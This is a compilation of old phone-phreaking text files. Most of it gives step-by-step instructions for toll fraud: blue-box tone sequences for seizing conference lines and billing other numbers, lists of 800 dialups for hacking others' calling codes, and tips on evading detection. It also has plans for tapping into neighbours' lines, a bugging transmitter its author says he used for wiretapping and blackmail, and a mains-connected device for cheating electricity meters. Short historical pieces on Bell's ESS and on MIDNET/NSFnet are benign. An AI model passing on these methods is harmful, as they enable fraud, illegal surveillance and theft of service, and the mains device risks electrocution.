 RUN TSPS 2
 CHOSE OPTION 1
 CHOSE OPTION 6
 CHOSE SUB-OPTION 9

  NOW TYPE:

 1-514-555-1212 (DASHES ARE NOT NEEDED)

LISTEN WITH YOUR HANDSET, AND AS SOON AS YOU HEAR A LOUD 'CLICK', THEN TYPE

 $

TO GENERATE THE 2600 HZ. TONE.  THIS OBNOXIOUS TONE WILL CONTINUE FOR A FEW
SECONDS, THEN LISTEN AGAIN AND YOU SHOULD HEAR ANOTHER LOUD 'CLICK'.

 NOW TYPE:

 KM2130801050S

WHERE 'K' = KP TONE
      'M' = MULTI FREQUENCY MODE
      'S' = S TONE

NOW LISTEN TO THE HANDSET AGAIN, AND WAIT UNTIL YOU HEAR THE 'CLICK' AGAIN.
THEN TYPE:

  KM2139752975S

WHERE 2139751975 IS THE NUMBER TO BILL THE CONFERENCE CALL TO. NOTE: 213-975-
1975 IS A DISCONNECTED NUMBER, AND I STRONGLY ADVISE THAT YOU ONLY BILL THE
CALL TO THIS NUMBER, OR THE FONE COMPANY WILL FIND OUT, AND THEN..........
REMEBER, CONFERENCE CALLS ARE ITEMIZED, SO IF YOU DO BILL IT TO AN ENEMY'S NUMB
ER, HE CAN EASILY FIND OUT WHO DID IT AND HE CAN BUST YOU!

YOU SHOULD NOW HEAR 3 BEEPS, AND A SHORT PRE-RECORDED MESSAGE.  FROM HERE ON,
EVERYTHING IS ALL MENU DRIVEN.

 CONFERENCE CALL COMMANDS
 ---------- ---- --------

   FROM THE '#' MODE:

     1 = CALL A NUMBER
     6 = TRANSFER CONTROL
     7 = HANGS UP THE CONFERENCE CALL
     9 = WILL CALL A CONFERENCE OPERATR

STAY AWAY FROM 7 AND 9!  IF FOR SOME REASON AN OPERATOR GETS ON-LINE,
HANG UP! IF YOU GET A BUSY SIGNAL AFTER KM2130801050S, THAT MEANS THAT THE
TELECONFEREN CING LINE IS TEMPORARILY DOWN.  TRY LATER, PREFERRABLY FROM 9AM TO
5PM WEEK DAYS, SINCE CONFERENCE CALLS ARE PRIMARILY DESIGNED FOR BUSINESS
PEOPLE.
                THE LEECH




Gold Box Plans                                        by The Jolly Roger


HOW TO BUILD IT
_______________


     You will need the following:

Two 10K OHM and three 1.4K OHM resistors
Two 2N3904 transistors
Two Photo Cells
Two Red LED'S (The more light produced the better)
A box that will not let light in
Red and Green Wire

Light from the #1 LED must shine directly on the photocell #1. The gold
box I made needed the top of the LED's to touch the photo cell for it to
work.

The same applies to the #2 photo cell and LED.

          1
    :-PHOTOCELL--: 
    :            :
    :            :BASE
    :    1     TTTTT
    :  +LED-   TRANSISTOR              
    :          TTTTT                   
    :           : :                    
    :  -I(--    : :COLLECTOR
RED1--<     >:--: :-------:-----GREEN2
       -I(-- :            ----------:
             :                      :  
        2    :-/+/+/-/+/+/-/+/+/-/+/+/ 
       LED     10K    10K   1.4K 1.4K  
                 RESISTORES

            2
       -PHOTOCELL-----------------
       :                         :
       :BASE                     :
     TTTTT                       :
     TRANSISTOR                  :
     TTTTT                       :     
      : :EMITTER                 :
GREEN1- --------------------------RED2
     :   :
     /+/+/
      1.4K  

The 1.4K resistor is variable and if the second part of the gold box is 
skipped it will still work but when someone picks up the phone they will
hear a faint dial tone in the background and might report it to the 
Gestapo er...(AT&T). 
1.4K will give you good reception with little risk of a Gestapo agent at 
your door.

    
Now that you have built it take two green wires of the same length and
strip the ends, twist two ends together and connect them to green1 and
place a piece of tape on it with "line #1" writing on it.

Continue the process with red1 only use red wire. Repeat with red2 and 
green2 but change to line #2.





HOW TO INSTALL
______________

You will need to find two phone lines that are close together. Label one of
teh phone lines "Line #1". Cut the phone lines and take the outer coating
off it. Tere should be 4 wires. Cut the yellow and black wires off and
strip the red and green wires for both lines.

Line #1 should be in two pieces. Take the green wire of one end and connect 
it to one of the green wires on the gold box. Take the other half of line
#1 and hook the free green wire to the green wire on the phone line. Repeat
the process with red1 and the other line.

All you need to do now is to write down the phone numbers of the place you
hooked it up at and go home and call it. You should get a dial tone!!!
If not, try changing the emittor with the collector.


Have a great time with this!            --------Exodus----------


The History of ESS                     Courtesy of the Jolly Roger

   Of all the new 1960s wonders of telephone technology -
satellites, ultra modern Traffic Service Positions (TSPS) for
operators, the picturephone, and so on - the one that gave Bell
Labs the most trouble, and unexpectedly became the greatest
development effort in Bell System's history, was the perfection
of an electronic switching system, or ESS.

   It may be recalled that such a system was the specific end in
view when the project that had culminated in the invention of the
transistor had been launched back in the 1930s. After successful
accomplishment of that planned miracle in 1947-48, further delays
were brought about by financial stringency and the need for
further development of the transistor itself. In the early 1950s,
a Labs team began serious work on electronic switching. As early
as 1955, Western Electric became involved when five engineers
from the Hawthorne works were assigned to collaborate with the
Labs on the project. The president of AT&T in 1956, wrote
confidently, "At Bell Labs, development of the new electronic
switching system is going full speed ahead. We are sure this will
lead to many improvements in service and also to greater
efficiency. The first service trial will start in Morris, Ill.,
in 1959." Shortly thereafter, Kappel said that the cost of the
whole project would probably be $45 million.

   But it gradually became apparent that the developement of a
commercially usable electronic switching system - in effect, a
computerized telephone exchange - presented vastly greater
technical problems than had been anticipated, and that,
accordingly, Bell Labs had vastly underestimated both the time
and the investment needed to do the job. The year 1959 passed
without the promised first trial at Morris, Illinois; it was
finally made in November 1960, and quickly showed how much more
work remained to be done. As time dragged on and costs mounted,
there was a concern at AT&T and something approaching panic at
Bell Labs. But the project had to go forward; by this time the
investment was too great to be sacrificed, and in any case,
forward projections of increased demand for telephone service
indicated that within a phew years a time would come when,
without the quantum leap in speed and flexibility that electronic
switching would provide, the national network would be unable to
meet the demand. In November 1963, an all-electronic switching
system went into use at the Brown Engineering Company at Cocoa
Beach, Florida. But this was a small installation, essentially
another test installation, serving only a single company.
Kappel's tone on the subject in the 1964 annual report was, for
him, an almost apologetic: "Electronic switching equipment must
be manufactured in volume to unprecedented standards of
reliability.... To turn out the equipment economically and with
good speed, mass production methods must be developed; but, at
the same time, there can be no loss of precision..." Another year
and millions of dollars later, on May 30, 1965, the first
commercial electric centeral office was put into service at
Succasunna, New Jersey.

   Even at Succasunna, only 200 of the town's 4,300 subscribers
initially had the benefit of electronic switching's added speed
and additional services, such as provision for three party
conversations and automatic transfer of incoming calls. But after
that, ESS was on its way. In January 1966, the second commercial
installation, this one serving 2,900 telephones, went into
service in Chase, Maryland. By the end of 1967 there were
additional ESS offices in California, Connecticut, Minnesota,
Georgia, New York, Florida, and Pennsylvania; by the end of 1970
there were 120 offices serving 1.8 million customers; and by 1974
there were 475 offices serving 5.6 million customers.

   The difference between conventional switching and electronic
switching is the difference between "hardware" and "software"; in
the former case, maintenence is done on the spot, with
screwdriver and pliers, while in the case of electronic
switching, it can be done remotely, by computer, from a centeral
point, making it possible to have only one or two technicians on
duty at a time at each switching center. The development program,
when the final figures were added up, was found to have required
a staggering four thousand man-years of work at Bell Labs and to
have cost not $45 million but $500 million!



The Lunch Box                          Courtesy of Exodus

Introduction
===========

The Lunch Box is a VERY simple transmitter which can be handy for all sorts of
things. It is quite small and can easily be put in a number of places. I have
successfully used it for tapping fones, getting inside info, blackmail and
other such things. The possibilities are endless. I will also include the plans
or an equally small receiver for your newly made toy. Use it for just about
anything. You can also make the transmitter and receiver together in one box
and use it as a walkie talkie.

Materials you will need
======================

(1) 9 volt battery with battery clip
(1) 25-mfd, 15 volt electrolytic capacitor
(2) .0047 mfd capacitors
(1) .022 mfd capacitor
(1) 51 pf capacitor
(1) 365 pf variable capacitor
(1) Transistor antenna coil
(1) 2N366 transistor
(1) 2N464 transistor
(1) 100k resistor
(1) 5.6k resistor
(1) 10k resistor
(1) 2meg potentiometer with SPST switch
 Some good wire, solder, soldering iron, board to put it on, box (optional)

Schematic for The Lunch Box
===========================

This may get a tad confusing but just print it out and pay attention.

         [!]
          !
        51 pf
          !
       ---+----  ------------base   collector
      !        )(               2N366       +----+------/\/\/----GND
    365 pf     ()              emitter           !
       !        )(                 !              !
      +--------  ---+----         !              !
      !             !    !        !              !
     GND            /  .022mfd    !              !
                 10k\    !        !              !
                    /   GND       +------------------------emitter
                    !             !              !             2N464
                    /           .0047            !          base   collector
              2meg  \----+        !              !   +--------+       !
                    /    !       GND             !   !                !
                        GND                      !   !                !
        +-------------+.0047+--------------------+   !                !
                                                      !   +--25mfd-----+
            -----------------------------------------+   !            !
       microphone                                        +--/\/\/-----+
            ---------------------------------------------+   100k     !
                                                                      !
                  GND---->/<---------------------!+!+!+---------------+
                        switch                  Battery
                    from 2meg pot.


Notes about the schematic
=========================

1.  GND means ground
2.  The GND near the switch and the GND by the 2meg potentiometer should be
    connected.
3.  Where you see:  )(
                    ()
                    )( it is the transistor antenna coil with 15 turns of
                       regular hook-up wire around it.
4.  The middle of the loop on the left side (the left of "()") you should run
    a wire down to the "+" which has nothing attached to it. There is a .0047
    capacitor on the correct piece of wire.
5.  For the microphone use a magnetic earphone (1k to 2k).
6.  Where you see "[!]" is the antenna. Use about 8 feet of wire to broadcast
    approx 300ft. Part 15 of the FCC rules and regulation says you can't
    broadcast over 300 feet without a license. (Hahaha). Use more wire for an
    antenna for longer distances. (Attach it to the black wire on the fone
    line for about a 250 foot antenna!)

Operation of the Lunch Box
==========================

This transmitter will send the signals over the AM radio band. You use the
variable capacitor to adjust what freq. you want to use. Find a good unused
freq. down at the lower end of the scale and you're set. Use the 2 meg pot. to
adjust gain. Just fuck with it until you get what sounds good. The switch on
the 2meg is for turning the Lunch Box on and off. When everything is adjusted,
turn on an AM radio adjust it to where you think the signal is. Have a friend
lay some shit thru the Box and tune in to it. That's all there is to it. The
plans for a simple receiver are shown below:

The Lunch Box receiver
======================

(1) 9 volt battery with battery clip
(1) 365 pf variable capacitor
(1) 51 pf capacitor
(1) 1N38B diode
(1) Transistor antenna coil
(1) 2N366 transistor
(1) SPST toggle switch
(1) 1k to 2k magnetic earphone

Schematic for receiver
======================

         [!]
           !
        51 pf
          !
     +----+----+
     !         !
     )       365 pf
     (----+    !
     )    !    !
     +---------+---GND
          !
          +---*>!----base  collector-----
             diode      2N366           earphone
                        emitter    +-----
                          !        !
                         GND       !
                                    -
                                   +
                                   - battery
                                   +
           GND------>/<------------+
                  switch

Closing statement
=================

This two devices can be built for under a total of $10.00. Not too bad. Using
these devices in illegal ways is your option. If you get caught, I accept NO
responsibility for your actions. This can be a lot of fun if used correctly.
Hook it up to the red wire on the phone line and it will send the
conversation over the air waves.

Enjoy!
 


Olive Box Plans                        Courtesy of Exodus

    This is a relatively new box, and all it basically does is serve as a phone
ringer. You have two choices for ringers, a piezoelectric transducer (ringer),
or a standard 8 ohm speaker. The speaker has a more pleasant tone to it, but
either will do fine. This circuit can also be used in conjunction with a rust
box to control an external something or other when the phone rings. Just connect
the 8 ohm speaker output to the inputs on the rust box, and control the pot to
tune it to light the light (which can be replaced by a relay for external
controlling) when the phone rings.

             ______________
            |              |        ^
       NC --|-- 5      4 --|-----/\/\/------->G
            |              |      / R2
G<----)|----|-- 6      3 --|-- NC
    | C3    |      U1      |
     -------|-- 7      2 --|---------- --- -- - > TO RINGER
            |              |
        ----|-- 8      1 --|--
       |    |______________|  |
       |                       ---/\/\/----|(----- L1
       |                           R1      C1
        ------------------------------------------ L2

                  a. Main ringer TTL circuit

(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)

                                   _
FROM PIN 2 < - -- --- ----------| |_| |------------->G
                                    P1

                  b. Peizoelectric transducer

(>::::::::::::::::::::::::::::::::::::::::::::::::::::::::<)

                                                      __  /|
FROM PIN 2 < - -- --- ---------|(---------.  .-------|  |/ |
                                          >||<       |S1|  |
                                          >||<     --|  |  |
                                          >||<    |  |__|\ |
                              G<---------.>||<.---        \|
                                           T1
                c. Elctro magnetic transducer
Parts List
----------

U1 - Texas Instruments TCM1506
T1 - 4000:8 ohm audio transfomer
S1 - 8 ohm speaker
R1 - 2.2k resistor
R2 - External variable resistor; adjusts timing frequency
C1 - .47uF capacitor
C2 - .1uF capacitor
C3 - 10uF capacitor
L1 - Tip
L2 - Ring
     L1 and L2 are the phone line.


Shift Rate:
-----------

  This is the formula for determining the shift rate:

                   1                   1
    SR = --------------------- = ------------ = 6.25 Hz
         (DSR(1/f1)+DSR(1/f2))    128     128
                                 ----  + ----
                                 1714    1500


              DSR = Shift Devider Rate ratio = 128
                f1 = High Output Frequency = 1714
               f2 = Low Output Frequency = 1500



The Tron Box                 Written by The GREAT Captain Crunch!!
                             Courtesy of  Exodus

   ------------------R-----F----
   I   I   I                   I
   I   I   I                   I-
  (C) (C) (C)
   I   I   I                   I-
   I   I   I                   I
   -----------------------------

 (C)=CAPACITOR
  F =FUSE
  R =RESISTOR
 I,- ARE WIRE
  PARTS LIST:
 (3) ELECTROLYTIC CAPACITORS RATED AT 50V(LOWEST) .47UF
 (1) 20-30OHM 1/2 WATT RESISTOR
 (1) 120VOLT FUSE (AMP RATING BEST TO USE AT LEAST HALF OF TOTAL
     HOUSE CURRENT OR EVEN LESS IT KEEPS YOU FROM BLOWING YOUR
     BREAKER JUST IN CASE...)
 (1) POWER CORD (CUT UP AN EXTENSTION CORD. NEED PLUG PART AND WIRE)
 (1) ELECTRICALLY INSULATED BOX


REST OF SIF YOUR DONT FILL COMFORTABLE ABOUT ELECTRICITY THEN DONT
PLAY WITH THIS THERE IS VOLTAGE PRESENT THAT WILL
***KILL*** YOU......................

THE THING WORKS WHEN THE LOAD IN YOUR HOUSE IS LOW LIKE AT NIGHT TIME. IT
WILL PUT A REVERSE PHASE SIGNAL ON THE LINE AND CANCEL OUT THE OTHER PHASE
AND PUT A REVERSE PHASE RUNNING EVERYTHING IN THE HOUSE. WELL IF YOU HAVE
EVER SWITCHED THE POWER LEADS ON A D.C. (BATTERY POWERED) MOTOR YOU
WILL SEE THAT IT RUNS BACKWARDS WELL YOUR ELECTRIC METER SORT OF WORKS
THIS WAY...SO REVERSE PHASE MAKES THE METER SLOW DOWN AND IF YOUR
LUCKY IT WILL GO BACKWARDS. ANYWAY IT MEANS A CHEAPER ELECTRIC BILL.


Phreaker's Phunhouse                   Courtesy of Exodus

 
    The long awaited prequil to Phreaker's Guide has finally arrived.
Conceived from the boredom and loneliness that could only be derived from:
The Traveler!  But now, he has returned in full strength (after a small
vacation) and is here to 'World Premiere' the new files everywhere. Stay
cool. This is the prequil to the first one, so just relax. This is not made
to be an exclusive ultra elite file, so kinda calm down and watch in the
background if you are too cool for it.
 
/-/   Phreak Dictionary   /-/
 
     Here you will find some of the basic but necessary terms that should be
known by any phreak who wants to be respected at all.
 
         Phreak  : 1. The action of using mischevious and mostly illegal
                      ways in order to not pay for some sort of tele-
                      communications bill, order, transfer, or other service.
                      It often involves usage of highly illegal boxes and
                      machines in order to defeat the security that is set
                      up to avoid this sort of happening. [fr'eaking]. v.

                   2. A person who uses the above methods of destruction and
                      chaos in order to make a better life for all.  A true
                      phreaker will not not go against his fellows or narc
                      on people who have ragged on him or do anything
                      termed to be dishonorable to phreaks. [fr'eek]. n.

                   3. A certain code or dialup useful in the action of
                      being a phreak. (Example: "I hacked a new metro
                      phreak last night.")
 
 Switching System: 1. There are 3 main switching systems currently employed
                      in the US, and a few other systems will be mentioned
                      as background.

                    A) SxS: This system was invented in 1918 and was
                       employed in over half of the country until 1978. It
                       is a very basic system that is a general waste of
                       energy and hard work on the linesman. A good way to
                       identify this is that it requires a coin in the phone
                       booth before it will give you a dial tone, or that no
                       call waiting, call forwarding, or any other such
                       service is available.  Stands for: Step by Step

                    B) XB: This switching system was first employed in 1978
                       in order to take care of most of the faults of SxS
                       switching.  Not only is it more efficient, but it
                       also can support different services in various forms.
                       XB1 is Crossbar Version 1. That is very limited and
                       is hard to distinguish from SxS except by direct view
                       of the wiring involved. Next up was XB4, Crossbar
                       Version 4. With this system, some of the basic things
                       like DTMF that were not available with SxS can be
                       accomplished. For the final stroke of XB, XB5 was
                       created. This is a service that can allow DTMF plus
                       most 800 type services (which were not always
                       available.) Stands for: Crossbar.

                    C) ESS: A nightmare in telecom. In vivid color, ESS is
                       a pretty bad thing to have to stand up to. It is
                       quite simple to identify. Dialing 911 for emergencies,
                       and ANI [see ANI below] are the most common facets of
                       the dread system. ESS has the capability to list in a
                       person's caller log what number was called, how long
                       the call took, and even the status of the conversation
                       (modem or otherwise.) Since ESS has been employed,
                       which has been very recently, it has gone through
                       many kinds of revisions. The latest system to date is
                       ESS 11a, that is employed in Washington D.C. for
                       security reasons. ESS is truly trouble for any
                       phreak, because it is 'smarter' than the other
                       systems. For instance, if on your caller log they saw
                       50 calls to 1-800-421-9438, they would be able to do
                       a CN/A [see Loopholes below] on your number and
                       determine whether you are subscribed to that service
                       or not. This makes most calls a hazard, because
                       although 800 numbers appear to be free, they are
                       recorded on your caller log and then right before you
                       receive your bill it deletes the billings for them.
                       But before that the are open to inspection, which is
                       one reason why extended use of any code is dangerous
                       under ESS. Some of the boxes [see Boxing below] are
                       unable to function in ESS.  It is generally a menace
                       to the true phreak. Stands For: Electronic Switching
                       System. Because they could appear on a filter
                       somewhere or maybe it is just nice to know them
                       anyways.

                       A) SSS: Strowger Switching System. First
                          non-operator system available.

                       B) WES: Western Electronics Switching. Used about 40
                          years ago with some minor places out west.

            Boxing:  1) The use of personally designed boxes that emit or
                        cancel electronical impulses that allow simpler
                        acting while phreaking. Through the use of separate
                        boxes, you can accomplish most feats possible with
                        or without the control of an operator.

                     2) Some boxes and their functions are listed below.
                        Ones marked with '*' indicate that they are not
                        operatable in ESS.

                      *Black Box: Makes it seem to the phone company that
                                  the phone was never picked up.
                      Blue Box  : Emits a 2600hz tone that allows you to do
                                  such things as stack a trunk line, kick
                                  the operator off line, and others.
                        Red Box : Simulates the noise of a quarter, nickel,
                                  or dime being dropped into a payphone.
                     Cheese Box : Turns your home phone into a pay phone to
                                  throw off traces (a red box is usually
                                  needed in order to call out.)
                     *Clear Box : Gives you a dial tone on some of the old
                                  SxS payphones without putting in a coin.
                      Beige Box : A simpler produced linesman's handset that
                                  allows you to tap into phone lines and
                                  extract by eavesdropping, or crossing
                                  wires, etc.
                     Purple Box : Makes all calls made out from your house
                                  seem to be local calls.

          ANI [ANI]: 1) Automatic Number Identification. A service
                        available on ESS that allows a phone service [see
                        Dialups below] to record the number that any certain
                        code was dialed from along with the number that was
                        called and print both of these on the customer bill.
                        950 dialups [see Dialups below] are all designed
                        just to use ANI. Some of the services do not have
                        the proper equipment to read the ANI impulses yet,
                        but it is impossible to see which is which without
                        being busted or not busted first.

 Dialups [dy'l'ups]: 1) Any local or 800 extended outlet that allows instant
                        access to any service such as MCI, Sprint, or AT&T
                        that from there can be used by handpicking or using
                        a program to reveal other peoples codes which can
                        then be used moderately until they find out about
                        it and you must switch to another code (preferrably
                        before they find out about it.)

                     2) Dialups are extremely common on both senses. Some
                        dialups reveal the company that operates them as
                        soon as you hear the tone. Others are much harder
                        and some you may never be able to identify.  A small
                        list of dialups:

                             1-800-421-9438 (5 digit codes)
                             1-800-547-6754 (6 digit codes)
                             1-800-345-0008 (6 digit codes)
                             1-800-734-3478 (6 digit codes)
                             1-800-222-2255 (5 digit codes)

                     3) Codes: Codes are very easily accessed procedures
                        when you call a dialup. They will give you some sort
                        of tone.  If the tone does not end in 3 seconds,
                        then punch in the code and immediately following the
                        code, the number you are dialing but strike the
                        '1' in the beginning out first. If the tone does
                        end, then punch in the code when the tone ends.
                        Then, it will give you another tone.  Punch in the
                        number you are dialing, or a '9'. If you punch in
                        a '9' and the tone stops, then you messed up a
                        little. If you punch in a tone and the tone
                        continues, then simply dial then number you are
                        calling without the  '1'.

                     4) All codes are not universal. The only type that I
                        know of that is truly universal is Metrophone.
                        Almost every major city has a local Metro dialup
                        (for Philadelphia, (215)351-0100/0126) and since the
                        codes are universal, almost every phreak has used
                        them once or twice. They do not employ ANI in any
                        outlets that I know of, so feel free to check
                        through your books and call 555-1212 or, as a more
                        devious manor, subscribe yourself. Then, never use
                        your own code. That way, if they check up on you due
                        to your caller log, they can usually find out that
                        you are subscribed.  Not only that but you could set
                        a phreak hacker around that area and just let it
                        hack away, since they usually group them, and, as a
                        bonus, you will have their local dialup.

                     5) 950's. They seem like a perfectly cool phreakers
                        dream. They are free from your house, from payphones,
                        from everywhere, and they host all of the major long
                        distance companies (950)1044 <MCI>, 950)1077
                        <Sprint>, 950-1088 <S+ylines>, 950-1033 <Us
                        Telecom>.) Well, they aren't. They were designed for
                        ANI. That is the point, end of discussion.
 
     A phreak dictionary. If you remember all of the things contained on
that fileup there, you may have a better chance of doing whatever it is you
do. This next section is maybe a little more interesting...
 
Blue Box Plans:
---------------
 
     These are some blue box plans, but first, be warned, there have been
2600hz tone detectors out on operator trunk lines since XB4. The idea behind
it is to use a 2600hz tone for a few very naughty functions that can really
make your day lighten up. But first, here are the plans, or the heart of the
file:

700  :   1   :   2   :   4   :   7   :  11   :
900  :   +   :   3   :   5   :   8   :  12   :
1100 :   +   :   +   :   6   :   9   :  KP   :
1300 :   +   :   +   :   +   :  10   :  KP2  :
1500 :   +   :   +   :   +   :   +   :  ST   :
     : 700   : 900   :1100   :1300   :1500   :
 
     Stop! Before you diehard users start piecing those little tone tidbits
together, there is a simpler method. If you have an Apple-Cat with a
program like Cat's Meow IV, then you can generate the necessary tones, the
2600hz tone, the KP tone, the KP2 tone, and the ST tone through the dial
section. So if you have that I will assume you can boot it up and it works,
and I'll do you the favor of telling you and the other users what to do with
the blue box now that you have somehow constructed it. The connection to an
operator is one of the most well known and used ways of having fun with your
blue box. You simply dial a TSPS (Traffic Service Positioning Station, or
the operator you get when you dial '0') and blow a 2600hz tone through the
line. Watch out! Do not dial this direct! After you have done that, it is
quite simple to have fun with it. Blow a KP tone to start a call, a ST tone
to stop it, and a 2600hz tone to hang up. Once you have connected to it,
here are some fun numbers to call with it:

      0-700-456-1000  Teleconference (free, because you are the operator!)
      (Area code)-101 Toll Switching
      (Area code)-121 Local Operator (hehe)
      (Area code)-131 Information
      (Area code)-141 Rate & Route
      (Area code)-181 Coin Refund Operator
      (Area code)-11511 Conference operator (when you dial 800-544-6363)

     Well, those were the tone matrix controllers for the blue box and some
other helpful stuff to help you to start out with. But those are only the
functions with the operator. There are other k-fun things you can do with it.

 More advanced Blue Box Stuff:

     Oops. Small mistake up there. I forgot tone lengths. Um, you blow a
tone pair out for up to 1/10 of a second with another 1/10 second for silence
between the digits. KP tones should be sent for 2/10 of a second. One way to
confuse the 2600hz traps is to send pink noise over the channel (for all of
you that have decent BSR equalizers, there is major pink noise in there.)

     Using the operator functions is the use of the 'inward' trunk line.
Thatis working it from the inside. From the 'outward' trunk, you can do such
things as make emergency breakthrough calls, tap into lines, busy all of the
lines in any trunk (called 'stacking'), enable or disable the TSPS's, and
for some 4a systems you can even re-route calls to anywhere.
 
     All right. The one thing that every complete phreak guide should be
without is blue box plans, since they were once a vital part of phreaking.
Another thing that every complete file needs is a complete listing of all of
the 800 numbers around so you can have some more Fu7nC
 /-/   800 Dialup Listings  /-/
 
1-800-345-0008 (6)   1-800-547-6754 (6)
1-800-245-4890 (4)   1-800-327-9136 (4)
1-800-526-5305 (8)   1-800-858-9000 (3)
1-800-437-9895 (7)   1-800-245-7508 (5)
1-800-343-1844 (4)   1-800-322-1415 (6)
1-800-437-3478 (6)   1-800-325-7222 (6)
 
     All right, set Cat Hacker 1.0 on those numbers and have a fuck of a
day. That is enough with 800 codes, by the time this gets around to you I
dunno what state those codes will be in, but try them all out anyways and
see what you get. On some 800 services now, they have an operator who will
answer and ask you for your code, and then your name. Some will switch back
and forth between voice and tone verification, you can never be quite sure
which you will be upagainst.

     Armed with this knowledge you should be having a pretty good time
phreaking now. But class isn't over yet, there are still a couple important
rules that you should know. If you hear continual clicking on the line, then
you should assume that an operator is messing with something, maybe even
listening in on you. It is a good idea to call someone back when the phone
starts doing that. If you were using a code, use a different code and/or
service to call him back.

     A good way to detect if a code has gone bad or not is to listen when
the number has been dialed. If the code is bad you will probably hear the
phone ringing more clearly and more quickly than if you were using a
different code.  If someone answers voice to it then you can immediately
assume that it is an operative for whatever company you are using. The famed
'311311' code for Metro is one of those. You would have to be quite stupid
to actually respond, because whoever you ask for the operator will always
say 'He's not in right now, can I have him call you back?' and then they
will ask for your name and phone number. Some of the more sophisticated
companies will actually give you a carrier on a line that is supposed to
give you a carrier and then just have garbage flow across the screen like it
would with a bad connection. That is a feeble effort to make you think that
the code is still working and maybe get you to dial someone's voice, a good
test for the carrier trick is to dial anumber that will give you a carrier
that you have never dialed with that code before, that will allow you to
determine whether the code is good or not. For our next section, a lighter
look at some of the things that a phreak should not be without. A vocabulary.
A few months ago, it was a quite strange world for the modem people out
there. But now, a phreaker's vocabulary is essential if you wanna make a
good impression on people when you post what you know about certain subjects.
 
 /-/    Vocabulary    /-/
 
 - Do not misspell except certain exceptions:

             phone -> fone
             freak -> phreak

 - Never substitute 'z's for 's's. (i.e. codez -> codes)

 - Never leave many characters after a post (i.e. Hey Dudes!#!@#@!#!@)

 - NEVER use the 'k' prefix (k-kool, k-rad, k-whatever)

 - Do not abbreviate. (I got lotsa wares w/ docs)

 - Never substitute '0' for 'o' (r0dent, l0zer).

 - Forget about ye old upper case, it looks ruggyish.
 
     All right, that was to relieve the tension of what is being drilled
into your minds at the moment.  Now, however, back to the teaching course.
Here are somethings you should know about phones and billings for phones,
etc.
 
     LATA: Local Access Transference Area. Some people who live in large
cities or areas may be plagued by this problem. For instance, let's say you
live in the 215 area code under the 542 prefix (Ambler, Fort Washington). If
you went to dial in a basic Metro code from that area, for instance,
351-0100, that might not be counted under unlimited local calling because it
is out of your LATA.  For some LATA's, you have to dial a '1' without the
area code before you can dial the phone number. That could prove a hassle
for us all if you didn't realize you would be billed for that sort of call.
In that way, sometimes, it is better to be safe than sorry and phreak.

     The Caller Log: In ESS regions, for every household around, the phone
company has something on you called a Caller Log. This shows every single
number that you dialed, and things can be arranged so it showed every number
that was calling to you. That's one main disadvantage of ESS, it is mostly
computerized so a number scan could be done like that quite easily. Using a
dialup is an easy way to screw that, and is something worth remembering.
Anyways, with the caller log, they check up and see what you dialed. Hmm...
you dialed 15 different 800 numbers that month. Soon they find that you are
subscribed to none of those companies. But that is not the only thing. Most
people would imagine "But wait! 800 numbers don't show up on my phone
bill!". To those people, it is a nice thought, but 800 numbers are picked up
on the caller log until right before they are sent off to you. So they can
check right up on you before they send it away and can note the fact that
you fucked up slightly and called one too many 800 lines.
 
     Right now, after all of that, you should have a pretty good idea of how
to grow up as a good phreak. Follow these guidelines, don't show off, and
don't take unnecessary risks when phreaking or hacking.

(*Greets to Pee Wee for this file taken from his 'Hell Disk' #1*)
                    -----------Exodus----------





                                ==Phrack Inc.==

                     Volume Three, Issue 27, File 3 of 12

       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
       <>                                                            <>
       <>                   Introduction to MIDNET                   <>
       <>                   ~~~~~~~~~~~~~~~~~~~~~~                   <>
       <>        Chapter Seven Of The Future Transcendent Saga       <>
       <>                                                            <>
       <>               A More Indepth Look Into NSFnet              <>
       <>             National Science Foundation Network            <>
       <>                                                            <>
       <>                Presented by Knight Lightning               <>
       <>                        June 16, 1989                       <>
       <>                                                            <>
       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>


Prologue
~~~~~~~~
If you are not already familiar with NSFnet, I would suggest that you read:

"Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13), and definitely;
"NSFnet:  National Science Foundation Network" (Phrack Inc., Volume Three,
                                                Issue 26, File 4 of 11).


Table Of Contents
~~~~~~~~~~~~~~~~~
*  Introduction
*  The DOD Protocol Suite
*  Names and Addresses In A Network
*  Telnet (*NOT* Telenet)
*  File Transfer
*  Mail


Introduction
~~~~~~~~~~~~
MIDNET is a regional computer network that is part of the NSFnet, the National
Science Foundation Network.  Currently, eleven mid-United States universities
are connected to each other and to the NSFnet via MIDnet:

UA  - University of Arkansas at Fayetteville
ISU - Iowa State University at Ames
UI  - University of Iowa at Iowa City
KSU - Kansas State University at Manhattan
KU  - University of Kansas at Lawrence
UMC - University of Missouri at Columbia
WU  - Washington University at St. Louis, Missouri
UNL - University of Nebraska at Lincoln
OSU - Oklahoma State University at Stillwater
UT  - University of Tulsa (Oklahoma)
OU  - University of Oklahoma at Norman

Researchers at any of these universities that have funded grants can access the
six supercomputer centers funded by the NSF:

John Von Neuman Supercomputer Center
National Center for Atmospheric Research
Cornell National Supercomputer Facility
National Center for Supercomputing Applications
Pittsburgh Supercomputing Center
San Diego Supercomputing Center

In addition, researchers and scientists can communicate with each other over a
vast world-wide computer network that includes the NSFnet, ARPAnet, CSnet,
BITnet, and others that you have read about in The Future Transcendent Saga.
Please refer to "Frontiers" (Phrack Inc., Volume Two, Issue 24, File 4 of 13)
for more details.

MIDnet is just one of several regional computer networks that comprise the
NSFnet system.  Although all of these regional computer networks work the same,
MIDnet is the only one that I have direct access to and so this file is written
from a MIDnet point of view.  For people who have access to the other regional
networks of NSFnet, the only real differences depicted in this file that would
not apply to the other regional networks are the universities that are served
by MIDnet as opposed to:

NYSERnet  in New York State
SURAnet   in the southeastern United States
SEQSUInet in Texas
BARRnet   in the San Francisco area
MERIT     in Michigan

           (There are others that are currently being constructed.)

These regional networks all hook into the NSFnet backbone, which is a network
that connects the six supercomputer centers.  For example, a person at Kansas
State University can connect with a supercomputer via MIDnet and the NSFnet
backbone.  That researcher can also send mail to colleagues at the University
of Delaware by using MIDnet, NSFnet and SURAnet.  Each university has its own
local computer network which connects on-campus computers as well as providing
a means to connecting to a regional network.

Some universities are already connected to older networks such as CSnet, the
ARPAnet and BITnet.  In principal, any campus connected to any of these
networks can access anyone else in any other network since there are gateways
between the networks.

Gateways are specialized computers that forward network traffic, thereby
connecting networks.  In practice, these wide-area networks use different
networking technology which make it impossible to provide full functionality
